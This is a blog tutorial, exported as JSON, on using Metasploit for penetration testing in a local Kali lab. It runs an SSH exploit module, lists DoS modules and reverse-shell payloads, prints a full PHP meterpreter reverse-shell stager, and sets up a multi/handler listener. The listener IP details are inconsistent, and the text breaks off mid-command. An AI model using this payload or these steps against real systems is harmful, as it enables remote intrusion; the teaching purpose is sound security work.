{"id":17976,"date":"2021-11-25T12:16:14","date_gmt":"2021-11-25T06:46:14","guid":{"rendered":"https:\/\/www.varutra.com\/?p=17976"},"modified":"2022-12-02T11:26:15","modified_gmt":"2022-12-02T05:56:15","slug":"penetration-testing-using-metasploit-framework","status":"publish","type":"post","link":"https:\/\/www.varutra.com\/varutravrt3\/penetration-testing-using-metasploit-framework\/","title":{"rendered":"Penetration Testing Using Metasploit Framework"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" width=\"1920\" height=\"1080\" src=\"https:\/\/varutra-1a3b6.kxcdn.com\/wp-content\/uploads\/2021\/11\/Penetration-Testing-Using-Metasploit-Framework-1024x535.png\"  class=\"sh-overlay-item sh-table-cell ls-is-cached lazyloaded\" data-rel=\"lightcase\" title=\"Penetration Testing Using Metasploit Framework - Varutra Consulting\"><br \/>\nMetasploit Framework is a powerful open-source penetration testing framework. You get to know all the information about penetration testing, IDS signature, and software vulnerabilities. It allows the execution and development of the exploit code against a remote target tool. Metasploit is not illegal itself, but it depends on what you use it for.<\/p>\n<p>&nbsp;<\/p>\n<h3><strong>Major keywords in the Metasploit framework<\/strong><\/h3>\n<p>The <strong>module<\/strong> is a software application in the Metasploit framework that carries out tasks like exploiting and scanning and the targets.<\/p>\n<p>They are the key components of the framework and are broken down into 7 types below:<\/p>\n<ol>\n<li>Exploits<\/li>\n<li>Payloads<\/li>\n<li>Auxiliaries<\/li>\n<li>Encoders<\/li>\n<li>Evasions<\/li>\n<li>Nops<\/li>\n<li>Post<\/li>\n<\/ol>\n<p><strong>Payloads<\/strong> are the simple scripts that are often used in module <strong>exploits<\/strong> by taking advantage of the system\u2019s vulnerabilities. <strong>Auxiliary<\/strong>\u00a0modules are the only modules that are not exploited. Several interesting features allow them to do more than just exploiting.<\/p>\n<p>&nbsp;<\/p>\n<p><strong>Let\u2019s get started\u2026<\/strong><\/p>\n<p>Updating the Metasploit is always a good idea. It is recommended to check this weekly.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17978 aligncenter\" src=\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/Updating-the-Metasploit-1.png\" alt=\"Updating the Metasploit\" width=\"599\" height=\"166\" srcset=\"https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/Updating-the-Metasploit-1.png 599w, https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/Updating-the-Metasploit-1-300x83.png 300w\" sizes=\"(max-width: 599px) 100vw, 599px\" \/><\/p>\n<p style=\"text-align: center\"><strong>Fig.1<\/strong><\/p>\n<p>Launch the Metasploit console like this.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17982 aligncenter\" src=\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/Launch-the-Metasploit-console-2.png\" alt=\"Launch the Metasploit console\" width=\"586\" height=\"248\" srcset=\"https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/Launch-the-Metasploit-console-2.png 586w, https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/Launch-the-Metasploit-console-2-300x127.png 300w\" sizes=\"(max-width: 586px) 100vw, 586px\" \/><\/p>\n<p style=\"text-align: center\"><strong>Fig.2<\/strong><\/p>\n<p>You can always seek help in the console.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17980 aligncenter\" src=\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/help-in-the-console-3.png\" alt=\"help in the console\" width=\"599\" height=\"374\" srcset=\"https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/help-in-the-console-3.png 599w, https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/help-in-the-console-3-300x187.png 300w\" sizes=\"(max-width: 599px) 100vw, 599px\" \/><\/p>\n<p style=\"text-align: center\"><strong>Fig.3<\/strong><\/p>\n<p>You can search for modules based on your target.<\/p>\n<p>msf6 &gt; <strong>search cisco<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p><strong>Information gathering\u00a0<\/strong>is also an important task of ethical hacking and penetration testing. Several tools seamlessly integrate with Metasploit like Nmap. Let\u2019s test using Nmap.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17981 aligncenter\" src=\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/Information-gathering-4.png\" alt=\"Information gathering\" width=\"628\" height=\"274\" srcset=\"https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/Information-gathering-4.png 628w, https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/Information-gathering-4-300x131.png 300w\" sizes=\"(max-width: 628px) 100vw, 628px\" \/><\/p>\n<p style=\"text-align: center\"><strong>Fig.4<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p><a href=\"https:\/\/tools.kali.org\/information-gathering\/nmap\">Nmap<\/a>\u00a0allows you to scan a host to identify it and to find out the services it is providing. You have now an option to choose from the\u00a0<a href=\"https:\/\/www.exploit-db.com\/\">Exploit Database<\/a>\u00a0or search for modules in\u00a0<a href=\"https:\/\/www.metasploit.com\/\">Metasploit<\/a> with this information. Scan your local Kali instance, check that it enabled the SSH server.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-17977 aligncenter\" src=\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/search-for-modules-in-Metasploit-5.png\" alt=\"search for modules in Metasploit \" width=\"685\" height=\"497\" srcset=\"https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/search-for-modules-in-Metasploit-5.png 685w, https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/search-for-modules-in-Metasploit-5-300x218.png 300w\" sizes=\"(max-width: 685px) 100vw, 685px\" \/><\/p>\n<p style=\"text-align: center\"><strong>Fig.5<\/strong><\/p>\n<p>&nbsp;<\/p>\n<h3>This procedure is for \u201cssh\u201d alone. Now you will get results in Metasploit.<\/h3>\n<p>So, if you go for the \u201chelp\u00a0&lt;command&gt;\u201d option, for example, you type, \u201chelp search\u201d you will get many details regarding the use of the command. For example, you may not know that you can filter your searches as well which is explained in the help.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17979 aligncenter\" src=\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/Example-6.png\" alt=\"Example\" width=\"535\" height=\"85\" srcset=\"https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/Example-6.png 535w, https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/Example-6-300x48.png 300w\" sizes=\"(max-width: 535px) 100vw, 535px\" \/><\/p>\n<p style=\"text-align: center\"><strong>Fig.6<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>Let\u2019s try this\u2026<\/p>\n<p>msf6 &gt; search cve:2020 type:exploit platform:-linux ssh<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17984 aligncenter\" src=\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/Exploit-Platform-7.png\" alt=\"Exploit Platform\" width=\"628\" height=\"139\" srcset=\"https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/Exploit-Platform-7.png 628w, https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/Exploit-Platform-7-300x66.png 300w\" sizes=\"(max-width: 628px) 100vw, 628px\" \/><\/p>\n<p style=\"text-align: center\"><strong>Fig.7<\/strong><\/p>\n<p>Let\u2019s look at how SSH exploits on the Linux 2020 platform work.<\/p>\n<p>So, what does this actually do?<\/p>\n<p>&nbsp;<\/p>\n<p>msf6 &gt; <strong>info exploit\/linux\/ssh\/ibm_drm_a3user<\/strong><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-17985 aligncenter\" src=\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/SSH-exploits-on-the-Linux-2020-platform-work-8.png\" alt=\"SSH exploits on the Linux 2020 platform work\" width=\"628\" height=\"353\" srcset=\"https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/SSH-exploits-on-the-Linux-2020-platform-work-8.png 628w, https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/SSH-exploits-on-the-Linux-2020-platform-work-8-300x169.png 300w\" sizes=\"(max-width: 628px) 100vw, 628px\" \/><\/p>\n<p style=\"text-align: center\"><strong>Fig.8<\/strong><\/p>\n<p>&nbsp;<\/p>\n<h3>Time to exploit!<\/h3>\n<p>Using the Kali Linux SSH server for this example. The next step is to tell Metasploit that the Kali Linux SSH server is used for this exploit.<\/p>\n<p>&nbsp;<\/p>\n<p>msf6 &gt; use exploit\/linux\/ssh\/ibm_drm_a3user[*] No payload configured, defaulting to cmd\/unix\/interactmsf6 exploit(linux\/ssh\/ibm_drm_a3user) &gt;<\/p>\n<p>Now, configuring the options\u2026<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17988 aligncenter\" src=\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/configuring-the-options-9.png\" alt=\"configuring the options\" width=\"628\" height=\"237\" srcset=\"https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/configuring-the-options-9.png 628w, https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/configuring-the-options-9-300x113.png 300w\" sizes=\"(max-width: 628px) 100vw, 628px\" \/><\/p>\n<p style=\"text-align: center\"><strong>Fig.9<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>Now, we set the various options using the \u201c<strong>set<\/strong>\u201d command.<\/p>\n<p>msf6 exploit(linux\/ssh\/ibm_drm_a3user) &gt; <strong>set RHOSTS localhost<\/strong>RHOSTS =&gt; localhost<\/p>\n<p>Once the desired options are set, run \u201c<strong>exploit<\/strong>\u201d command.<\/p>\n<p>msf6 exploit(linux\/ssh\/ibm_drm_a3user) &gt; <strong>exploit<\/strong>[*] Exploiting target {:address=&gt;&#8221;0.0.0.1&#8243;, :hostname=&gt;&#8221;localhost&#8221;}\u00a0[*] 0.0.0.1:22 \u2013 Making an attempt to log in to the IBM Data Risk Manager appliance&#8230;<\/p>\n<p>&nbsp;<\/p>\n<p>In Metasploit, \u201csearch\u201d functionality is considered to be a powerful option, but you can also find other possible ways.<\/p>\n<p>&nbsp;<\/p>\n<h3><strong>What other exploit modules are available?<\/strong><\/h3>\n<p>There are two ways of finding this out. Firstly, run the \u201cbanner\u201d option again from the \u201cmsfconsole\u201d.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-17999 aligncenter\" src=\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/1-1.png\" alt=\"msfconsole\" width=\"327\" height=\"365\" srcset=\"https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/1-1.png 327w, https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/1-1-269x300.png 269w\" sizes=\"(max-width: 327px) 100vw, 327px\" \/><\/p>\n<p>As you can see, there are 2144 exploits, 1142 auxiliary, 365 posts, 592 payloads, 45 encoders, 10 nops, and 8 evasions at the time.<\/p>\n<p>&nbsp;<\/p>\n<p>Or, go for the second option, i.e., to exit \u201c<strong>msfconsole<\/strong>\u201d and look for \u201c<strong>modules<\/strong>\u201d in the Metasploit framework directory.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-17987 aligncenter\" src=\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/Metasploit-framework-directory-10.png\" alt=\"Metasploit framework directory\" width=\"556\" height=\"410\" srcset=\"https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/Metasploit-framework-directory-10.png 556w, https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/Metasploit-framework-directory-10-300x221.png 300w\" sizes=\"(max-width: 556px) 100vw, 556px\" \/><\/p>\n<p style=\"text-align: center\"><strong>Fig.10<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>Or, use maybe something more specific like \u201c<strong>firefox<\/strong>\u201d exploits.<\/p>\n<p>kali@kali)-[~]\u2514\u2500$ ls -l \/usr\/share\/metasploit-framework\/modules\/exploits\/firefox\/localtotal 4-rw-r&#8211;r&#8211; 1 kali root 1857 Jun 24 12:07 exec_shellcode.rb<\/p>\n<p>&nbsp;<\/p>\n<p>This way you have to use it in Metasploit.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17986 aligncenter\" src=\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/Metasploit-11.png\" alt=\"Metasploit\" width=\"676\" height=\"608\" srcset=\"https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/Metasploit-11.png 676w, https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/Metasploit-11-300x270.png 300w\" sizes=\"(max-width: 676px) 100vw, 676px\" \/><\/p>\n<p style=\"text-align: center\"><strong>Fig.11<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>msf6 &gt; <strong>use exploit\/firefox\/local\/exec_shellcode<\/strong>[*] No payload configured, defaulting to linux\/aarch64\/meterpreter\/reverse_tcp\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 msf6 exploit(firefox\/local\/exec_shellcode) &gt;<\/p>\n<p>&nbsp;<\/p>\n<h3><strong>What non-exploit modules are available?<\/strong><\/h3>\n<p>An auxiliary is a non-exploit module in Metasploit which does not come with a payload, while exploits usually come with a payload. They are a feature of the framework, that allows them for multiple purposes other than exploitation. For example, let here is the Denial-of-Service (DoS) auxiliary.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17991 aligncenter\" src=\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/Denial-of-Service-DoS-auxiliary-12.png\" alt=\"Denial-of-Service (DoS) auxiliary\" width=\"571\" height=\"520\" srcset=\"https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/Denial-of-Service-DoS-auxiliary-12.png 571w, https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/Denial-of-Service-DoS-auxiliary-12-300x273.png 300w\" sizes=\"(max-width: 571px) 100vw, 571px\" \/><\/p>\n<p style=\"text-align: center\"><strong>Fig.12<\/strong><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17992 aligncenter\" src=\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/Denial-of-Service-DoS-auxiliary-13.png\" alt=\"Denial-of-Service (DoS) auxiliary\" width=\"535\" height=\"519\" srcset=\"https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/Denial-of-Service-DoS-auxiliary-13.png 535w, https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/Denial-of-Service-DoS-auxiliary-13-300x291.png 300w\" sizes=\"(max-width: 535px) 100vw, 535px\" \/><\/p>\n<p style=\"text-align: center\"><strong>Fig.13<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>And maybe more specifically Cisco DoS modules?<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-17990 aligncenter\" src=\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/Cisco-DoS-modules-14.png\" alt=\"Cisco DoS modules\" width=\"581\" height=\"150\" srcset=\"https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/Cisco-DoS-modules-14.png 581w, https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/Cisco-DoS-modules-14-300x77.png 300w\" sizes=\"(max-width: 581px) 100vw, 581px\" \/><\/p>\n<p style=\"text-align: center\"><strong>Fig.14<\/strong><\/p>\n<p>That IOS HTTP Percent module sounds interesting?<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-18000 aligncenter\" src=\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/IOS-HTTP-Percent-module.png\" alt=\"IOS HTTP Percent module\" width=\"326\" height=\"744\" srcset=\"https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/IOS-HTTP-Percent-module.png 326w, https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/IOS-HTTP-Percent-module-131x300.png 131w\" sizes=\"(max-width: 326px) 100vw, 326px\" \/><\/p>\n<p>Thinking about how to exit a context.<\/p>\n<p>msf6 auxiliary(dos\/cisco\/ios_http_percentpercent) &gt; backmsf6 &gt;<\/p>\n<p>&nbsp;<\/p>\n<h3><strong>Reverse Shell Client (\u201cVictim\u201d)<\/strong><\/h3>\n<p>Reverse shells can be quarantined and detected by the systems that have antivirus software installed in it. This should act as a warning to ensure that you keep your system(s) up to date and have virus scanner software. This is because:<\/p>\n<p>&nbsp;<\/p>\n<p>\u201cMeterpreter\u201d is an exploit which we are going to use.<\/p>\n<p><strong>msf6<\/strong><strong> &gt; <\/strong><strong>search meterpreter<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>\u201c<strong>Meterpreter<\/strong>\u201d in Metasploit can create a number of platforms, that includesAvoid, Windows, Python, Apple iOS, FreeBSD, and more.<\/p>\n<p>&nbsp;<\/p>\n<p>Just to list a few\u2026<\/p>\n<p>payload\/python\/meterpreter\/reverse_tcp<br \/>\npayload\/android\/meterpreter\/reverse_tcp<br \/>\napple_ios\/aarch64\/meterpreter_reverse_tcp<br \/>\njava\/meterpreter\/reverse_tcp<br \/>\nlinux\/aarch64\/meterpreter_reverse_tcp<br \/>\nlinux\/armbe\/meterpreter_reverse_tcp<br \/>\nlinux\/mips64\/meterpreter_reverse_tcp<br \/>\nlinux\/mipsbe\/meterpreter_reverse_tcp<br \/>\nlinux\/mipsle\/meterpreter\/reverse_tcp<br \/>\nlinux\/mipsle\/meterpreter_reverse_tcp<br \/>\nlinux\/ppc\/meterpreter_reverse_tcp<br \/>\nlinux\/ppc64le\/meterpreter_reverse_tcp<br \/>\nlinux\/ppce500v2\/meterpreter_reverse_tcp<br \/>\nlinux\/x64\/meterpreter_reverse_tcp<br \/>\nlinux\/x86\/meterpreter_reverse_tcp<br \/>\nlinux\/zarch\/meterpreter_reverse_tcp<br \/>\nosx\/x64\/meterpreter_reverse_tcp<br \/>\nphp\/meterpreter_reverse_tcp<br \/>\npython\/meterpreter_reverse_tcp<br \/>\nwindows\/meterpreter_reverse_tcp<br \/>\nwindows\/x64\/meterpreter_reverse_tcp<\/p>\n<p>&nbsp;<\/p>\n<p>The Venom (<strong>msfvenom<\/strong>) documentation seems to use Windows as an example.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17994 aligncenter\" src=\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/Venom-15.png\" alt=\"Venom\" width=\"628\" height=\"140\" srcset=\"https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/Venom-15.png 628w, https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/Venom-15-300x67.png 300w\" sizes=\"(max-width: 628px) 100vw, 628px\" \/><\/p>\n<p style=\"text-align: center\"><strong>Fig.15<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>Let\u2019s try this out using Java.<\/p>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17995 aligncenter\" src=\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/Java-16-1.png\" alt=\"Java\" width=\"628\" height=\"122\" srcset=\"https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/Java-16-1.png 628w, https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/Java-16-1-300x58.png 300w\" sizes=\"(max-width: 628px) 100vw, 628px\" \/><\/p>\n<p style=\"text-align: center\"><strong>Fig.16<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>Or you can also choose another option like PHP.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17993 aligncenter\" src=\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/PHP-17.png\" alt=\"PHP\" width=\"628\" height=\"141\" srcset=\"https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/PHP-17.png 628w, https:\/\/www.varutra.com\/varutravrt3\/wp-content\/uploads\/2021\/11\/PHP-17-300x67.png 300w\" sizes=\"(max-width: 628px) 100vw, 628px\" \/><\/p>\n<p style=\"text-align: center\"><strong>Fig.17<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>In PHP, if you run Linux \u201c<strong>cat<\/strong>\u201d on the file and easily view the code it is creating in the exploit.<\/p>\n<p>&nbsp;<\/p>\n<p>\/*&lt;?php \/**\/ error_reporting(0); $ip = &#8216;192.168.153.129&#8217;; $port = 4444; if (($f = &#8216;stream_socket_client&#8217;) &amp;&amp; is_callable($f)) { $s = $f(&#8220;tcp:\/\/{$ip}:{$port}&#8221;); $s_type = &#8216;stream&#8217;; } if (!$s &amp;&amp; ($f = &#8216;fsockopen&#8217;) &amp;&amp; is_callable($f)) { $s = $f($ip, $port); $s_type = &#8216;stream&#8217;; } if (!$s &amp;&amp; ($f = &#8216;socket_create&#8217;) &amp;&amp; is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = &#8216;socket&#8217;; } if (!$s_type) { die(&#8216;no socket funcs&#8217;); } if (!$s) { die(&#8216;no socket&#8217;); } switch ($s_type) { case &#8216;stream&#8217;: $len = fread($s, 4); break; case &#8216;socket&#8217;: $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack(&#8220;Nlen&#8221;, $len); $len = $a[&#8216;len&#8217;]; $b = &#8221;; while (strlen($b) &lt; $len) { switch ($s_type) { case &#8216;stream&#8217;: $b .= fread($s, $len-strlen($b)); break; case &#8216;socket&#8217;: $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS[&#8216;msgsock&#8217;] = $s; $GLOBALS[&#8216;msgsock_type&#8217;] = $s_type; if (extension_loaded(&#8216;suhosin&#8217;) &amp;&amp; ini_get(&#8216;suhosin.executor.disable_eval&#8217;)) { $suhosin_bypass=create_function(&#8221;, $b); $suhosin_bypass(); } else { eval($b); } die();<\/p>\n<p>&nbsp;<\/p>\n<p>It won\u2019t be a good idea to run Java (runme.jar), PHP (runme.php), and Windows (payload.exe). It is to be run or installed on the victim\u2019s device.<\/p>\n<p><strong>\u00a0<\/strong><\/p>\n<h3><strong>Reverse Shell Server (\u201cAttacker\u201d)<\/strong><\/h3>\n<p>Now, configure and proceed with the reverse shell server.<\/p>\n<p>msf6 &gt; <strong>use exploit\/multi\/handler<\/strong>[*] Using configured payload generic\/shell_reverse_tcp\u00a0msf6 exploit(multi\/handler) &gt; <strong>set payload java\/meterpreter\/reverse_tcp<\/strong>payload =&gt; java\/meterpreter\/reverse_tcp\u00a0msf6 exploit(multi\/handler) &gt; <strong>show options<\/strong>\u00a0Module options (exploit\/multi\/handler):\u00a0\u00a0\u00a0 Name\u00a0 Current Setting\u00a0 Required\u00a0 Description\u00a0\u00a0 &#8212;-\u00a0 &#8212;&#8212;&#8212;&#8212;&#8212;\u00a0 &#8212;&#8212;&#8211;\u00a0 &#8212;&#8212;&#8212;&#8211;\u00a0\u00a0Payload options (java\/meterpreter\/reverse_tcp):\u00a0\u00a0\u00a0 Name\u00a0\u00a0 Current Setting\u00a0 Required\u00a0 Description\u00a0\u00a0 &#8212;-\u00a0\u00a0 &#8212;&#8212;&#8212;&#8212;&#8212;\u00a0 &#8212;&#8212;&#8211;\u00a0 &#8212;&#8212;&#8212;&#8211;\u00a0\u00a0 LHOST\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 yes\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 The listen address (an interface may be specified)\u00a0\u00a0 LPORT\u00a0 4444\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 yes\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 The listen port\u00a0\u00a0Exploit target:\u00a0\u00a0\u00a0 Id\u00a0 Name\u00a0\u00a0 &#8212;\u00a0 &#8212;-\u00a0\u00a0 0\u00a0\u00a0 Wildcard Target\u00a0msf6 exploit(multi\/handler) &gt; <strong>set LHOST 192.168.153.129<\/strong>LHOST =&gt; 192.168.153.129\u00a0msf6 exploit(multi\/handler) &gt; <strong>set LPORT 4444<\/strong>LPORT =&gt; 4444\u00a0msf6 exploit(multi\/handler) &gt; <strong>show options<\/strong>\u00a0Module options (exploit\/multi\/handler):\u00a0\u00a0\u00a0 Name\u00a0 Current Setting\u00a0 Required\u00a0 Description\u00a0\u00a0 &#8212;-\u00a0 &#8212;&#8212;&#8212;&#8212;&#8212;\u00a0 &#8212;&#8212;&#8211;\u00a0 &#8212;&#8212;&#8212;&#8211;\u00a0Payload options (java\/meterpreter\/reverse_tcp):\u00a0\u00a0\u00a0 Name\u00a0\u00a0 Current Setting\u00a0 Required\u00a0 Description\u00a0\u00a0 &#8212;-\u00a0\u00a0 &#8212;&#8212;&#8212;&#8212;&#8212;\u00a0 &#8212;&#8212;&#8211;\u00a0 &#8212;&#8212;&#8212;&#8211;\u00a0\u00a0 LHOST\u00a0 192.168.153.129\u00a0 yes\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 The listen address (an interface may be specified)\u00a0\u00a0 LPORT\u00a0 4444\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 yes\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 The listen port\u00a0Exploit target:\u00a0\u00a0\u00a0 Id\u00a0 Name\u00a0\u00a0 &#8212;\u00a0 &#8212;-\u00a0\u00a0 0\u00a0\u00a0 Wildcard Target\u00a0msf6 exploit(multi\/handler) &gt; <strong>exploit<\/strong>[*] Started reverse TCP handler on 192.168.153.129:4444<\/p>\n<p>&nbsp;<\/p>\n<p>So, what did we do here\u2026?<\/p>\n<ul>\n<li>Generic TCP reverse shell is to be configured<\/li>\n<li>Set the payload\u00a0<strong>java\/meterpreter\/reverse_tcp<\/strong><\/li>\n<li>As you need to set, so look at the options thoroughly<\/li>\n<li>Set the LHOST and LPORT<\/li>\n<li>Checked the options are properly set<\/li>\n<li>Begin the exploit to listen on\u00a0<strong>168.1.2:4444<\/strong><\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p>In another terminal, you can see that Kali is listening on TCP 4444 now.<\/p>\n<p>&nbsp;<\/p>\n<p>kali@kali:~$ <strong>netstat -antup | grep :4444<\/strong><br \/>\n(Not all processes could be identified, non-owned process info<br \/>\nwill not be shown, you would have to be root to see it all.)<br \/>\ntcp\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 0\u00a0\u00a0\u00a0\u00a0\u00a0 0 <strong>192.168.1.2:4444<\/strong>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 0.0.0.0:*\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 LISTEN\u00a0\u00a0\u00a0\u00a0\u00a0 63774\/ruby<\/p>\n<p>&nbsp;<\/p>\n<p>Browse for the exploit in the home directory of Kali (<strong>runme.jar<\/strong>) and run it by giving it execute permissions.<\/p>\n<p>&nbsp;<\/p>\n<p>kali@kali:~$ <strong>chmod +x runme.jar <\/strong><br \/>\nkali@kali:~$ <strong>.\/runme.jar<\/strong><br \/>\nkali@kali:~$<\/p>\n<p>You would expect to see \u201c<strong>runme.jar<\/strong>\u201d running right?<\/p>\n<p>kali@kali:~$ <strong>ps aux | grep runme<\/strong><br 